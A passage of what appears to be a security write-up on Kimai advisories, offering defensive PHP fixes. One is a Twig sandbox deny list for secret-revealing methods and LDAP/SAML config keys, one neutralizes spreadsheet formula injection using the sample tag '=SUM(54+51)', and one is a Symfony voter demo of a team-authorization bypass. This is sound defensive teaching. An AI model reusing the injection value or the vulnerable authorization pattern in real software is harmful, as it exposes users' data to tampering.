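use Twig\Sandbox\SecurityPolicyInterface;
use Twig\TwigFunction;

final class TriggerWordPolicy implements SecurityPolicyInterface
{
    // A method whose lower-cased name contains any of these words is refused,
    // so getApiToken(), getPlainApiToken() and getTotpSecret() are all caught
    // without being enumerated one by one.
    private const TRIGGER_WORDS = ['password', 'token', 'secret', 'credential', 'apikey'];

    public function __construct(private SecurityPolicy $inner) {}

    // Tags, filters and functions stay allowlisted by Twig's stock policy.
    public function checkSecurity(array $tags, array $filters, array $functions): void
    {
        $this->inner->checkSecurity($tags, $filters, $functions);
    }

    public function checkMethodAllowed(object $obj, string $method): void
    {
        $lcm = strtolower($method);
        foreach (self::TRIGGER_WORDS as $word) {
            if (str_contains($lcm, $word)) {
                throw new SecurityNotAllowedMethodError(
                    sprintf('Calling "%s" on "%s" is not allowed in templates.', $method, $obj::class),
                    $obj::class,
                    $method
                );
            }
        }
    }

    public function checkPropertyAllowed(object $obj, string $property): void {}
}

// Sandboxed config(): the saml./ldap. namespaces are refused first, so a later
// allowlist mistake cannot leak them; everything else must be allowlisted.
function sandboxedConfig(array $settings): TwigFunction
{
    $allowlist = ['theme.branding.company', 'defaults.customer.currency'];
    $deniedPrefixes = ['saml.', 'ldap.'];

    return new TwigFunction('config', static function (string $key) use ($settings, $allowlist, $deniedPrefixes): ?string {
        foreach ($deniedPrefixes as $prefix) {
            if (str_starts_with($key, $prefix)) {
                throw new SecurityError(sprintf('Config key "%s" is not available in templates.', $key));
            }
        }
        if (!in_array($key, $allowlist, true)) {
            throw new SecurityError(sprintf('Config key "%s" is not available in templates.', $key));
        }
        return $settings[$key] ?? null;
    });
}

// Constructed sample data standing in for kimai.yaml values and an invoice user.
$settings = [
    'theme.branding.company'        => 'Example GmbH',
    'ldap.connection.password'      => 'bind-secret',
    'saml.connection.sp.privateKey' => '-----BEGIN PRIVATE KEY----- ...',
];

final class User
{
    public function getAlias(): string { return 'alice'; }
    public function getApiToken(): ?string { return '$2y$13$constructed.hash.value'; }
}

$twig = new Environment(new ArrayLoader([
    'ok'     => 'Invoice for {{ config("theme.branding.company") }}, prepared by {{ model.user.alias }}',
    'config' => '{{ config("ldap.connection.password") }}',
    'method' => '{{ model.user.getApiToken() }}',
]));
$twig->addExtension(new SandboxExtension(
    new TriggerWordPolicy(new SecurityPolicy(['if', 'for'], ['escape', 'upper'], [], [], ['config'])),
    true // sandbox every template, not only {% sandbox %} blocks
));
$twig->addFunction(sandboxedConfig($settings));

$context = ['model' => ['user' => new User()]];
foreach (['ok', 'config', 'method'] as $name) {
    try {
        echo $name, ': ', $twig->render($name, $context), PHP_EOL;
    } catch (SecurityError $e) {
        echo $name, ': BLOCKED (', $e->getMessage(), ')', PHP_EOL;
    }
}
```

The `ok` template renders, while `config` and `method` raise a `SecurityError` before any secret reaches the output. The prefix check runs before the allowlist lookup on purpose: the allowlist is the thing operators are most likely to extend later, and keeping the `saml.`/`ldap.` refusal independent of it preserves the defense-in-depth the advisory describes. The trigger-word rule is deliberately coarse (it also refuses a harmless `getTokenCount()`), which is the right trade-off for a template language that untrusted-but-privileged users can write.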
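For the XLSX formula injection described under GHSA-3xc2-h5r3-wv3r (tag names joined with `implode()` and written unchanged, so a `=`-prefixed tag becomes a formula cell), the following PHP is an added example of the export-side neutralization a fix needs; it is not Kimai's `ArrayFormatter` or OpenSpout code. `FORMULA_TRIGGERS`, `neutralizeFormula()`, `formatTagsForExport()`, `exportRowsToCsv()` and the sample rows are all constructed for this example.

```php
<?php
// Added example, not Kimai's code: an export-side formatter that stops a tag
// name such as "=SUM(54+51)" from being promoted to a spreadsheet formula when
// timesheet rows are written out as XLSX or CSV. FORMULA_TRIGGERS,
// neutralizeFormula(), formatTagsForExport(), exportRowsToCsv() and the sample
// rows are constructed for this example.
// Run: php export_formatter.php   (PHP 8.0+)
declare(strict_types=1);

// Leading characters that Excel and LibreOffice read as the start of a formula
// in a CSV cell; "=" is also what spreadsheet writers key on when they promote
// a bare string to a formula cell.
const FORMULA_TRIGGERS = ['=', '+', '-', '@', "\t", "\r"];

function startsWithFormulaTrigger(string $value): bool
{
    return $value !== '' && in_array($value[0], FORMULA_TRIGGERS, true);
}

// Returns a value that will be stored and displayed as text. Numeric strings
// such as "-5" or "-1800" are legitimate and left untouched; any other value
// that starts with a trigger character gets a leading apostrophe, the usual
// "this is text, not a formula" marker. Idempotent: an already neutralized
// value starts with "'" and passes through unchanged.
function neutralizeFormula(string $value): string
{
    if (!startsWithFormulaTrigger($value) || is_numeric($value)) {
        return $value;
    }
    return "'" . $value;
}

// Same shape as the vulnerable path described in the advisory (tag names joined
// with implode()), except the joined cell value is neutralized before it reaches
// the writer, so the cell can never begin with "=".
function formatTagsForExport(array $tags): string
{
    return neutralizeFormula(implode(', ', $tags));
}

// CSV writer that applies the same rule to every string cell; fputcsv() handles
// quoting, so a trigger character after a delimiter inside a cell is harmless.
function exportRowsToCsv(array $rows): string
{
    $fh = fopen('php://memory', 'r+');
    foreach ($rows as $row) {
        fputcsv($fh, array_map(
            static fn (mixed $v): mixed => is_string($v) ? neutralizeFormula($v) : $v,
            $row
        ));
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed timesheet rows: the second carries the hostile tag from the
// advisory, the third shows the other trigger characters and a legitimate
// negative number that must survive untouched.
$rows = [
    ['user' => 'alice',   'duration' => 3600,  'tags' => ['billable']],
    ['user' => 'mallory', 'duration' => -1800, 'tags' => ['=SUM(54+51)', 'ops']],
    ['user' => 'bob',     'duration' => 900,   'tags' => ['@remote', '-5']],
];

foreach ($rows as $row) {
    printf("%-8s %6d  %s\n", $row['user'], $row['duration'], formatTagsForExport($row['tags']));
}

echo exportRowsToCsv(array_map(
    static fn (array $r): array => [$r['user'], (string) $r['duration'], formatTagsForExport($r['tags'])],
    $rows
));
```

Two design points worth noting. First, the check is applied to the joined cell value rather than to each tag, because the promotion the advisory describes is decided by the first character of the cell; neutralizing the cell is what matters, and `neutralizeFormula()` is idempotent so calling it again in the writer costs nothing. Second, `is_numeric()` guards the `-` trigger so that durations and negative amounts are not mangled, which is the edge case that usually breaks a naive "prefix everything starting with `-`" rule. Where the writer library offers an explicitly typed string cell, handing it that instead of a bare string is a stronger fix than any character-level rewriting (that is an assumption about the library's API, not something the advisory states).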
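The authorization mistake in GHSA-jv9x-w4gm-hwcm (`#[IsGranted('edit_team')]` instead of `#[IsGranted('edit', 'team')]`, so the `TeamVoter` abstains and no ownership check runs) is easiest to see by running both decisions through Symfony's `AccessDecisionManager`. The PHP below is an added example, not Kimai's code: `User`, `Team`, `PermissionVoter`, `TeamVoter` and `TeamController` are illustrative assumptions, and only the attribute strings `edit_team` and `edit` come from the advisory. It uses the Symfony 6/7 `security-core` API; the controller attributes are shown for their shape, while the decision itself is exercised directly.

```php
<?php
// Added example, not Kimai's code: why #[IsGranted('edit_team')] and
// #[IsGranted('edit', subject: 'team')] authorize differently. User, Team,
// PermissionVoter, TeamVoter and TeamController are illustrative; only the
// attribute strings 'edit_team' and 'edit' are taken from the advisory.
// Run: composer require symfony/security-core symfony/security-http && php team_voter.php   (PHP 8.1+)
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

use Symfony\Component\Security\Core\Authentication\Token\TokenInterface;
use Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken;
use Symfony\Component\Security\Core\Authorization\AccessDecisionManager;
use Symfony\Component\Security\Core\Authorization\Voter\Voter;
use Symfony\Component\Security\Core\User\UserInterface;
use Symfony\Component\Security\Http\Attribute\IsGranted;

final class User implements UserInterface
{
    public function __construct(private string $name, private array $roles) {}
    public function getUserIdentifier(): string { return $this->name; }
    public function getRoles(): array { return $this->roles; }
    public function eraseCredentials(): void {}
}

final class Team
{
    public function __construct(public readonly string $name, public readonly User $teamlead) {}
}

// Stands in for a role/permission voter: grants the bare permission string
// 'edit_team' to every teamlead or admin, with no idea which team is meant.
final class PermissionVoter extends Voter
{
    protected function supports(string $attribute, mixed $subject): bool
    {
        return $attribute === 'edit_team';
    }

    protected function voteOnAttribute(string $attribute, mixed $subject, TokenInterface $token): bool
    {
        $roles = $token->getRoleNames();
        return in_array('ROLE_TEAMLEAD', $roles, true) || in_array('ROLE_ADMIN', $roles, true);
    }
}

// Entity-level voter: only answers when asked about 'edit' on a concrete Team.
final class TeamVoter extends Voter
{
    protected function supports(string $attribute, mixed $subject): bool
    {
        // Without a Team subject this returns false and the voter abstains,
        // which is exactly what #[IsGranted('edit_team')] causes.
        return $attribute === 'edit' && $subject instanceof Team;
    }

    protected function voteOnAttribute(string $attribute, mixed $subject, TokenInterface $token): bool
    {
        $user = $token->getUser();
        if (!$user instanceof User) {
            return false;
        }
        if (in_array('ROLE_ADMIN', $user->getRoles(), true)) {
            return true;
        }
        /** @var Team $subject */
        return $subject->teamlead === $user;
    }
}

final class TeamController
{
    // Vulnerable shape: only PermissionVoter answers; TeamVoter never sees the team.
    #[IsGranted('edit_team')]
    public function patchByPermission(Team $team): void {}

    // Fixed shape: the Team is passed as subject, so TeamVoter's ownership check runs.
    #[IsGranted('edit', subject: 'team')]
    public function patchBySubject(Team $team): void {}
}

// Runs the same decision the framework makes for the attributes above.
function decide(User $user, string $attribute, ?Team $subject): bool
{
    $manager = new AccessDecisionManager([new PermissionVoter(), new TeamVoter()]);
    $token = new UsernamePasswordToken($user, 'main', $user->getRoles());
    return $manager->decide($token, [$attribute], $subject);
}

// Constructed data: two teamleads, each owning one team.
$alice = new User('alice', ['ROLE_TEAMLEAD']);
$bob   = new User('bob', ['ROLE_TEAMLEAD']);
$teamA = new Team('A', $alice);
$teamB = new Team('B', $bob);

printf("alice, 'edit_team', no subject:      %s\n", decide($alice, 'edit_team', null) ? 'GRANTED' : 'denied');
printf("alice, 'edit', subject team B (bob): %s\n", decide($alice, 'edit', $teamB) ? 'GRANTED' : 'denied');
printf("alice, 'edit', subject team A (own): %s\n", decide($alice, 'edit', $teamA) ? 'GRANTED' : 'denied');
```

The first decision is granted purely on Alice's role, which is the advisory's bug: any holder of `edit_team` can modify any team. The second is denied because the subject reaches `TeamVoter` and she is not Team B's teamlead; the third is granted on ownership. A useful review habit for Symfony code bases follows from this: whenever an `IsGranted` attribute names a permission string rather than an action plus a subject, check whether an entity voter exists for that action, because if it does, it is being silently bypassed.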